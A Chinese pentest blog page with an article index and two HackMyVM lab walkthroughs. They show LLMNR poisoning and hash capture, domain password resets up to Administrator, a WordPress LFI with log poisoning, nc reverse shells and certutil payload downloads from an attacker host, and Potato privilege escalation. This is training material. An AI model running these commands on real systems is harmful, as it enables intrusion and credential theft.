首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
11,115 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,847 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
5,318 阅读
4
几个常见的密码字典推荐
4,647 阅读
5
全网最全渗透测试靶场推荐【2026最新靶场推荐】,拒绝信息差
4,500 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
189
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
71
篇与
的结果
2025-11-06
文章推荐页
2025年11 月6日Nmap防火墙绕过技巧详解 955 162025年10 月30日【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用 2267 5628日HackMyVm-DC04:难 712 3028日HackMyVm-DC03 :中等 760 2527日HackMyVm-DC02 :中等 867 2427日HackMyVm-DC01 :简单 887 2027日Hackmyvm-TriplAdvisor :简单 792 1927日HackMyVm-Runas :简单 776 2527日HackMyVm-Always :简单 848 1827日HackMyVm-Nessus :简单 779 1827日HackMyVm-Liar :简单 621 2227日HackMyVm-Simple :简单 903 3027日HackMyVm-Zero :简单 771 3027日HackMyVm-quoted :简单 624 2527日HackMyVm-OMG :简单 899 3026日全网首发!HMV全套Windows机器提权,域渗透教程,2w字超详细 1908 2515日中秋放毒!永远9.9每月的高防云服务器!搭建自己的网安知识库! 799 2715日vuln靶机-GoldenEye1.1,OSCP必刷靶机 928 2215日vulnhub靶机-devt-improved,nano/vim提权 789 172025年9 月11日Photographer 1-vulnhub靶机渗透 1148 2611日Nightmare (v1.0.2)-vulnhub靶机渗透 716 911日Healthcare靶机渗透,vulnhub环境变量提权 1717 3011日Stapler-vulnhub靶机渗透 1263 2211日Devguru-vulnhub靶机渗透,OSCP之路 916 2011日Breach2.0-vulnhub靶机渗透,OSCP认证之路 688 222025年8 月14日vulnhub-Toppo靶机,python、awk的SUID提权,两种提权方式 844 2113日vulnhub-STAPLER: 1 内核&sudo提权 716 192025年7 月23日红队命令速查手册 915 2318日vulnhub–GlasgowSmile-v1.1 960 2116日12款优秀的终端工具推荐,来看看有没有你喜欢的! 902 1915日BurpSuite v2025.6.3汉化版,附激活教程 1913 3213日SRC平台推荐,挖SRC必须知道的25个漏洞提交平台 2610 1910日FeatherScan v4.0 – 适用于Linux的全自动内网信息收集工具 1798 406日sar靶机,suid计划任务提权 872 186日W34KN3SS,通过openssl漏洞公匙获取私匙 956 193日Windows提权方法一览 899 302025年6 月29日掩日-适用于红队的综合免杀工具 1080 2528日HW 中如何利用 WAF 缺陷进行绕过 1149 2224日Notepad++ v8.8.1 本地提权复现 1041 2322日2025最新渗透测试靶场推荐,新手必练的靶场推荐 3553 8720日靶机Misdirection: 1 ~ VulnHub 1132 2114日渗透测试命令汇总,常用的渗透测试命令大全 1023 2814日【内网渗透】隐藏通信隧道技术,牢饭直通车 1025 243日microsocks,一个轻量级的socks代理工具 1396 302025年5 月20日什么是OSCP国际渗透测试专家中级认证? 1000 1818日网易云js逆向代码分析 845 2918日java框架Shiro流量分析 869 2018日Linux进程隐藏 1039 2218日Kali Linux Shell编程:基础到进阶 851 2118日【Kali笔记】shodan的20种使用方法,信息收集必备 756 2818日一款在线的免杀平台AVEvasionCraftOnline 1157 2918日使用oh-my-posh美化Windows终端 735 1718日Metasploit Framework (MSF) 使用指南 1047 1718日DIRB:一款强大的Web目录扫描工具使用指南 1088 1618日【Kali笔记】figlet终端艺术字 1002 1718日Vuln靶机Prime_Series_Level-1 1326 3818日Vuln靶机NullByte 1469 3418日Vulnhub靶机Moria1.1 587 1218日Vulnhub靶机bob 1410 3118日Vulnhub-DERPNSTINK 1 1469 3618日vulnerable_Docker,3种代理方法打入内网,frp,MSF,reGeorg 1367 2918日Tr0ll系列提权教程,Tr0ll 靶机全系列(1-3) 295 1618日Tiki提权靶机渗透 991 3018日tar、zip命令提权—zico2 956 2718日PwnLab init-文件包含、反弹shell、提权–靶机渗透思路讲解 815 2418日FristiLeaks1.3-提权靶机渗透 364 918日雷池+frp内网穿透,搭建企业级内网防护,无需花高额费用买服务器,教科书级别教学 272 1818日HTB-EscapeTwo 785 718日超长攻击链vulhub靶机,TommyBoy1dot0 1219 2818日vulnhub提权靶机SickOS系列 1639 3818日vulnhub靶机hackme 1709 3918日Sudo的上级目录提权,SkyTower 1666 2918日pWnOS系列全教程,Webmin文件披露,Simple PHP Blog渗透教程 1361 2618日Kioptrix 提权靶机(1-5)全系列教程,Try Harder! 715 2618日JOY,ProFTPd的拷贝漏洞 1189 2918日IMF缓冲区提权渗透 1146 2618日Hack_Me_Please,js信息泄露,二级目录遍历 784 2418日FALL,wfuzz对参数的模糊测试 1109 2218日BSides-Vancouver-2018-Workshop,FTP匿名登录,wordpress渗透 778 1818日Blender软件的信息泄露—VulnOSv2 300 1518日提权靶机Node 438 918日红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路 358 1518日不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学 175 2018日靶机-election 978 2018日WEBDEVELOPER,tcpdump提权 918 2418日Vuln靶机SolidState 519 2018日稀有靶机-Readme 931 2218日红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学 833 2318日从0-1讲解RCE漏洞绕过,Windows与LinuxRCE漏洞绕过方式总结—-实战解析 678 2918日SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝 659 1718日文件上传10种WAF绕过姿势 1482 3918日upload-labs通关全教程(建议萌新收藏)Web安全-文件上传漏洞超详细解析 1342 3118日文件包含_PHP filter伪协议利用方式 1383 3018日从零开始学习文件包含 1324 3018日PHP反序列化漏洞从入门到深入8k图文介绍,以及phar伪协议的利用 1340 3818日XSS高级用法,SEO,挂ma,MS14_064利用 1166 2918日Web安全中的XSS攻击详细教学,XSS-Labs靶场通关全教程(建议收藏) 909 3018日phpStudy 小皮 Windows面板 存在RCE漏洞(nday) 826 2418日Kali下安装与使用BeEF-XSS 804 2418日【WAF剖析】10种XSS某狗WAF绕过姿势 930 2118日CTFHub技能树通关教程——SSRF漏洞原理攻击与防御 1024 2018日某cms的渗透测试过程 1180 2418日放开双手 ,SQL注入Fuzzing字典 (270个) 653 1118日从零开始学SQL注入(sql十大注入类型):技术解析与实战演练 408 1918日安全狗WAF绕过-SQL注入 262 1018日SQL注入之dnslog 373 1918日1w字带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透 386 1518日DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程 864 2218日DC-1综合靶场渗透从外网打到内网,权限提升,入侵痕迹清除,干货,建议收藏 784 2418日DC1-9(全)Linux提权靶机渗透教程 817 1818日AIWEB1综合靶场通关教程【附靶场环境】 860 2018日【渗透测试】DC-3提权靶场渗透教程 897 2418日棱镜X单兵渗透平台 1091 2918日SPF机制进行邮件钓鱼 875 2418日FTP匿名登录 934 2718日CS与MSF联动 900 2518日Linux隐身登录 1405 3718日【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF,CS 1641 2718日内网隐蔽扫描,Nmap高级用法 1789 3318日【内网渗透】免工具,内网和域内信息收集的40种方式总结 821 1818日渗透测试rbash逃逸 1099 1918日什么是域?如何搭建一个简单的域环境? 773 2418日find基础命令与提权教程 964 2618日【Kali笔记】MSF内网渗透,免杀过360 992 2118日Windows和Linux的命令混淆方式 311 818日Hadoop & Redis未授权访问漏洞,靶场实战——Vulfocus 343 818日伪静态注入总结 211 1218日Windows渗透操作系统 1336 3918日CTF-OS,一个专门为CTF设计的操作系统 1083 2718日几个常见的密码字典推荐 1967 3118日渗透测试中16款谷歌插件最全分享 1110 3718日车联网渗透系统 1079 2618日比Kali更稳定,工具更多,更加适合开发的操作系统blackarch 1285 2618日burp suite31款插件分享 1134 2818日2024年7月JetBrAIns全家桶激活到2099年工具分享,pycharm、IDE、phpStorm等专业版激活工具 815 3118日2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具 1006 3318日【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1 1060 4018日深入某CMS渗透测试:从弱口令到接管webshell 654 2718日CISP-PTE综合练习win2003 974 2318日CISP-PTE综合靶场解析,MSF综合利用MS14-058【附靶场环境】 782 2118日CISP-PTE考试靶场及通关攻略(附靶场源码) 1415 2318日GZCTF动态flag部署教程 1469 2818日GZCTF比赛平台搭建——单Docker部署 671 2318日信息收集:网络空间测绘FOFA,查询语法最全使用方法(图文解析) 816 1618日灯塔安装教程 1169 2018日九头蛇thc-hydra密码爆破,九头蛇简单使用 304 11
2025年11月06日
1,341 阅读
0 评论
0 点赞
2025-10-28
HackMyVm-DC03 :中等
13.1 外网打点nmap -sS -p- -T4 192.168.215.185 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'卧槽什么都没有,这怎么打?nmap -sS -p 53,13487,65005 -T4 192.168.215.185 -A扫错了,哈哈哈哈,靶机重启,原来是我换wifi了再来nmap -sS -p- -T4 192.168.215.25 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'nmap -sS -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49672,49685 -T4 192.168.215.25 -A根据上面的dc2靶场进行信息收集一波,ldap协议是开启着的,还有SMB协议enum4Linux-ng -A 192.168.215.25 -C13.2 尝试使用匿名登录SMB匿名连接13.3 kerberos 用户名枚举kerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt --dc 192.168.215.25charlie administrator wreed11 webserver爆破SMBnxc SMB 192.168.215.25 -u user -p user13.4 爆破 kerberos 协议kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt wreed11 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt charlie三个用户接失败13.4 LLMNR 投毒攻击13.4.1 具体流程骗取目标设备的账号密码哈希,具体流程如下: 监听局域网内的 LLMNR 请求:用 Responder(你之前用过的工具)等软件,在攻击机上监听局域网内的 LLMNR 广播; 伪造响应欺骗目标:当目标设备(比如域内的员工电脑)发起 LLMNR 请求(如解析 \\共享打印机名)时,攻击机抢先回复:“我就是你要找的设备,我的 IP 是攻击机 IP”; 骗取哈希值:目标设备相信后,会试图用当前登录用户的 “NTLM 哈希” 与攻击机建立连接(比如访问共享文件夹),攻击机就能捕获到这个哈希; 破解哈希或直接用哈希登录:拿到哈希后,可通过 hashcat 破解成明文密码,或直接用 “哈希传递(PTH)” 登录其他设备。 13.4.2 如何用 LLMNR 拿到域内哈希比如你在域渗透中,攻击机和目标域内的员工电脑在同一个网段(192.168.215.0/24): 在 Kali 上启动 Responder,开启 LLMNR 监听: 员工在电脑上误输入 \\不存在的共享名(比如 \\file-server),DNS 解析失败,触发 LLMNR 广播; Responder 捕获到这个请求,伪装成 file-server 回复员工电脑; 员工电脑用当前登录用户(比如 SOUPEDECODE\charlie)的 NTLM 哈希,尝试与攻击机建立 SMB 连接; Responder 成功捕获到 charlie 的哈希,你后续就可以用这个哈希进行 PTH 攻击,登录其他域内设备。 responder -I eth0 -wd这里应该是域控靶机的计划任务,所以能拿到hash拿到这个账号的hash,准备去爆破[SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd [SMB] NTLMv2-SSP Username : SOUPEDECODE\DC01$ [SMB] NTLMv2-SSP Hash : DC01$::SOUPEDECODE:b7c95f1435ed324f:38D48E36709F60B6B02218D61D394294:010100000000000000A791D28545DC0159ED6A549FAD342D0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009002C0063006900660073002F0053004F005500500045004400450043004F00440045002E004C004F00430041004C000000000000000000 --- [SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd [SMB] NTLMv2-SSP Username : soupedecode\xkate578 [SMB] NTLMv2-SSP Hash : xkate578::soupedecode:0215e15662d218c6:75CB92B3BD84CC2BA33FD7549A0D1EA4:010100000000000000A791D28545DC018EC3298268DA333B0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C006500530065007200760065007200000000000000000013.5 smb渗透找到账号密码,查看smb服务器内有什么东西xkate578:jesuschrist smbclient -L //192.168.215.25/ -U xkate578登录到share共享文件夹,发现user.txt尝试上传,发现这个用户有上传文件的权限使用evil-winrm连接失败evil-winrm -i 192.168.215.25 -u xkate578 -p jesuschrist13.6 查询域内SPN关联用户查询寻域内所有关联了SPN的用户(用于发现这些用户的TGS票据,从而破解密码)13.7 枚举域内用户SIDxkate578这个用户有查看域内SID信息的权限python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/xkate578@192.168.215.25 > results.txt把这些用户名信息导出为一个用户字典grep "SidTypeUser" /data/demo/results.txt | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt13.8 爆破 kerberos针对域用户 xkate578 进行 “密码暴力破解” 的操作,核心目的是通过字典攻击尝试获取该用户的明文密码。ntpdate 192.168.215.25 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt xkate578 -v13.9 nxc爆破smb使用nxc内网渗透神器,使用相同的账号密码爆破smb服务器,全部失败13.10 获取不需要预认证用户的AS-REP哈希全部没有impacket-GetNPUsers -dc-ip 192.168.215.25 soupedecode.local/ -usersfile target_users.txt利用之前得到的密码 xkate578:jesuschristldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=xkate578" memberOf > ldap_result.txt 参数 作用 -x 使用简单认证(非 SASL 认证),适合用用户名 / 密码登录。 -H ldap://192.168.215.25 指定 LDAP 服务器地址(这里是域控的 IP)。 -D "xkate578@SOUPEDECODE.LOCAL" 绑定的用户 DN(用户名),即使用 xkate578 的凭证登录 LDAP。 -w 'jesuschrist' 绑定用户的密码(xkate578 的密码)。 -b 'DC=SOUPEDECODE,DC=LOCAL' 查询的基准 DN(域的根目录),即从整个域范围查询。 "sAMAccountName=xkate578" 过滤条件:只查询 sAMAccountName 为 xkate578 的用户(精准定位自身)。 memberOf 只返回该用户的 memberOf 字段(即所属的组)。 > ldap_result.txt 将结果输出到文件,方便查看。 从结果中可以看到这个用户属于Account Operators 组作用: 创建 / 修改 / 删除普通域用户账号可在域内新增用户(如 testuser)、修改现有用户的属性(如密码、登录脚本、所属组等),但不能修改域管理员(Domain Admins)等高级账号。 管理用户组(非特权组)可创建新的普通用户组,或修改普通组的成员(如将 zximena448 加入某个组),但不能修改 Domain Admins、Enterprise Admins 等特权组。 重置普通用户密码可强制重置普通域用户的密码(无需知道原密码),例如将 zximena448 的密码改为 hacked123,进而控制该账号。 查看域内用户 / 组的详细信息比普通用户拥有更高的 LDAP 查询权限,可获取更多域内账号的属性(如密码过期时间、登录次数等)。 尝试利用net命令和这些凭证,向目标域添加一个用户,然后使用evil-winrm连接的时候,连接不上net rpc user add "it_support" "ItSupport@123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25 evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'将用户添加到远程管理组即可使用evil-winrm连接net rpc group addmem "Remote Management Users" it_support -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25 evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'那么尝试添加管理员组呢?很明显,之前已经说过了,Account Operators组的用户,可创建新的普通用户组,或修改普通组的成员(如将 zximena448 加入某个组),但不能修改 Domain Admins、Enterprise Admins 等特权组。再看看管理员组有哪些用户,一个是Operators,一个是Administrator,两个用户属于超级管理员’ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "memberOf=CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL" sAMAccountName name从 LDAP 查询结果中,有几个关键线索表明 Operators 是自定义组而非 Windows 内置组:Windows 内置操作员组都有特定的前缀: Backup Operators Print Operators Server Operators Account Operators 而这里发现: 组名:Operators(没有前缀) 这不符合 Windows 内置组的命名规范 sAMAccountName 分析ldif# Operators, Users, SOUPEDECODE.LOCAL dn: CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL name: Operators sAMAccountName: Operators关键点: sAMAccountName: Operators(没有数字后缀) Windows 内置组通常有特定的 sAMAccountName 格式 例如内置的 Account Operators 的 sAMAccountName 是 Account Operators 另外# 内置组通常在 Builtin 容器中 dn: CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL我们再来查看自定义组中有哪些用户ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "(&(objectClass=user)(memberOf=CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL))" sAMAccountName name# Account Operators 不能重置这些直接组成员的密码: - 直接属于 Administrators 的用户 - 直接属于 Domain Admins 的用户 # 但可以重置这些用户的密码: - 通过组嵌套获得管理员权限的用户 - 属于自定义管理组的用户再不清楚,就是这个链路Domain Admins (域管理员组) ↑ 包含 Operators (自定义管理组) ↑ 包含 fbeth103 (普通用户) xkate578 (Account Operators) → 可以重置 fbeth103 密码开始修改密码(回家重装了靶机,ip变了)net rpc user password "fbeth103" "P@ssw0rd123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.0.102 # 或者 [root@Kali] /home/Kali/DC03 ❯ rpcclient -U "xkate578" --password="jesuschrist" 192.168.56.126 ⏎ rpcclient $> setuserinfo2 fbeth103 23 "Pass1234!" rpcclient $> # 然后连接 evil-winrm -i 192.168.0.102 -u fbeth103 -p 'P@ssw0rd123'此时就已经得到了最后的root.txt内容它这个自定义既然组隶属于管理员组,那我们是不是能利用这个fbeth103用户去修改管理员的账号密码呢?现在试试┌──(root㉿Kali)-[~] └─# net rpc user password "Administrator" "NewAdminPass123" -U "SOUPEDECODE.LOCAL/fbeth103%P@ssw0rd123" -S 192.168.0.102 ┌──(root㉿Kali)-[~] └─# evil-winrm -i 192.168.0.102 -u Administrator -p 'NewAdminPass123' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami soupedecode\administrator 成功修改!都不需要去PTH(哈希传递攻击)了13.11 PTH攻击(hash传递)Secretdump获取域内hashimpacket-secretsdump 'SOUPEDECODE.LOCAL/fbeth103:P@ssw0rd123'@192.168.0.10213.12 工具推荐 ldapdomaindump除了ldapsearch工具之外,还有一个工具也可以看域内组织情况,叫做ldapdomaindumpldapdomaindump -u "SOUPEDECODE.LOCAL\fbeth103" -p P@ssw0rd123 192.168.0.102在生成的domain_groups.html中也能看到Operators属于Domain Admins组从这里也能看到fbeth103属于Operators组用这个工具更为方便13.13 DC03 域渗透总结本次 DC03 域渗透从外网打点开始,先通过 nmap 扫描确定目标为域控制器,开启 53、88、139、445、389 等关键端口。匿名登录 SMB 失败后,用 kerbrute 枚举到 charlie、administrator 等用户,爆破无果后通过 Responder 进行 LLMNR 投毒,捕获到 xkate578 的 NTLM 哈希并破解出密码。利用 xkate578(属 Account Operators 组)的账号管理权限,先创建影子账号并加入远程管理组,成功登录后枚举域内用户,发现自定义组 Operators 隶属于 Domain Admins,且包含用户 fbeth103。重置 fbeth103 密码并登录,利用其间接域管理员权限,成功修改 Administrator 密码,获取域控最高权限,最终找到 root.txt,全程未依赖复杂漏洞,主要通过权限嵌套与凭据复用推进。往期推荐全网首发!HMV全套Windows机器提权,域渗透教程,2w字超详细HackMyVm-DC04 :简单HackMyVm-DC03 :简单HackMyVm-DC02 :简单HackMyVm-DC01 :简单HackMyVm-TriplAdvisor :简单HackMyVm-Runas :简单HackMyVm-Always :简单HackMyVm-Nessus :简单HackMyVm-Liar :简单HackMyVm-Simple :简单HackMyVm-Simple :简单HackMyVm-Zero :简单HackMyVm-OMG :简单新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,Git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年10月28日
1,187 阅读
0 评论
0 点赞
2025-10-27
Hackmyvm-TriplAdvisor :简单
9.1 信息打点nmap -sS 192.168.53.243 -p- -T4发现有一个http的域名解析,需要我们在hosts文件中添加好相关的信息nmap -sS 192.168.53.243 -p 445,5985,8080 -T4 -A打开Windows的hosts文件,添加如下信息C:\Windows\System32\drivers\etc\hostskali攻击机器中也不能忘了(方便渗透测试,Windows中添加只是为了访问,当然也可以配置代理到kali)echo "192.168.53.243 tripladvisor" >> /etc/hosts打开信息收集插件,发现这是一个WordPress内容管理系统wpscan进行可能的用户,后台密码爆破wpscan --url http://tripladvisor:8080/wordpress/ -e u -P /usr/share/wordlists/fasttrack.txtWordPress版本信息已经被扫描出来了再使用详细扫描,发现一个插件wpscan --url http://tripladvisor:8080/wordpress/9.2 漏洞利用漏洞检索searchsploit editor 1.1 WordPress searchsploit -m 44340漏洞信息┌──(root㉿kali)-[/data/demo] └─# cat 44340.txt Product: Site Editor WordPress Plugin - https://wordpress.org/plugins/site-editor/ Vendor: Site Editor Tested version: 1.1.1 CVE ID: CVE-2018-7422 ** CVE description ** A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. ** Technical details ** In site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP’s require_once(). This parameter can be controlled by an attacker and is not properly sanitized. Vulnerable code: if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){ require_once $_REQUEST['ajax_path']; } https://plugins.trac.wordpress.org/browser/site-editor/trunk/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?rev=1640500#L5 By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system. ** Proof of Concept ** http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd ** Solution ** No fix available yet. ** Timeline ** 03/01/2018: author contacted through siteeditor.org's contact form; no reply 16/01/2018: issue report filled on the public GitHub page with no technical details 18/01/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail 19/01/2018: report sent; author says he will fix this issue "very soon" 31/01/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply 14/02/2018: WP Plugins team contacted; no reply 06/03/2018: vendor contacted; no reply 07/03/2018: vendor contacted; no reply 15/03/2018: public disclosure ** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI). -- Best Regards, Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI)存在文件包含漏洞,根据上面的url进行修改http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd因为这是Windows系统,不存在/etc/passwd,那么怎么快速判断文件是否存在?字典https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt打开bp这里我们上传不了文件(没有账号密码),所以只能包含日志文件c:/xampp/apache/logs/access.log9.3 反弹shell使用curl写入日志,并包含日志文件,尝试获取命令执行结果,结果能正常执行命令┌──(root㉿kali)-[/usr/share/wordlists] └─# curl -A "" http://tripladvisor:8080/wordpress/ ┌──(root㉿kali)-[/usr/share/wordlists] └─# curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=c:/xampp/apache/logs/access.log"根据前面传MSF马上去的经验,这里就传个nc吧curl -A "" http://tripladvisor:8080/wordpress/ curl -A "" http://tripladvisor:8080/wordpress/ curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=\xampp\apache\logs\access.log"切换到当前用户的文件夹,可以看到第一个flag将这个shell利用nc传到MSF中,进行本地漏扫(试一试,说不定就出来了呢,虽然它只在meterpreter后渗透模块中生效)nc.exe 192.168.53.51 1234 -e cmd9.4 MSF内核漏扫MSFconsole use exploit/multi/handler # 加载handler模块 # 根据目标系统选择payload(nc反弹的是基础shell,非meterpreter) # 目标是Windows,接收nc命令反弹的shell: set PAYLOAD Windows/shell_reverse_tcp set LHOST 192.168.53.51 # 攻击机IP(与nc反弹目标一致) set LPORT 1234 # 监听端口(与nc反弹端口一致) run -j # 启动监听,保持后台执行 use multi/recon/local_exploit_suggester # 使用本地提权漏扫模块,估计这里没效果,目前测试只有meterpreter模块反弹的shell能用 set session 1 # 设置反弹成功的会话id为1,使用 sessions 即可查看所有的会话id9.5 土豆提权certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET2.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET35.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET4.exe失败.\GodPotato-NET4.exe -cmd "cmd /c whoami" .\GodPotato-NET35.exe -cmd "cmd /c whoami" .\GodPotato-NET2.exe -cmd "cmd /c whoami"9.6 JuicyPotato提权certutil.exe -urlcache -split -f http://192.168.53.51:8000/JuicyPotato.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.listhttps://github.com/ohpe/juicy-potato/blob/master/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.list然后用这个工具测试certutil.exe -urlcache -split -f http://192.168.53.51:8000/juicy-potato/Test/test_clsid.bat此时你的靶机上应该要有这三个文件此时验证一下,能否正常访问administrotar的文件,结果为拒绝访问(因为靶机限制了我不能使用whoami,所以只能这样验证)回到目录,执行此文件随便选择一个系统权限的clsid最终提权命令如下,kali记得开ncJuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\Windows\system32\cmd.exe -a "/c C:\xampp\htdocs\WordPress\wp-content\plugins\editor\editor\extensions\pagebuilder\includes\nc.exe 192.168.53.51 4444 -e cmd.exe" -t *此时就可以访问管理员的文件了往期推荐全网首发!HMV全套Windows机器提权,域渗透教程,2w字超详细HackMyVm-DC04 :简单HackMyVm-DC03 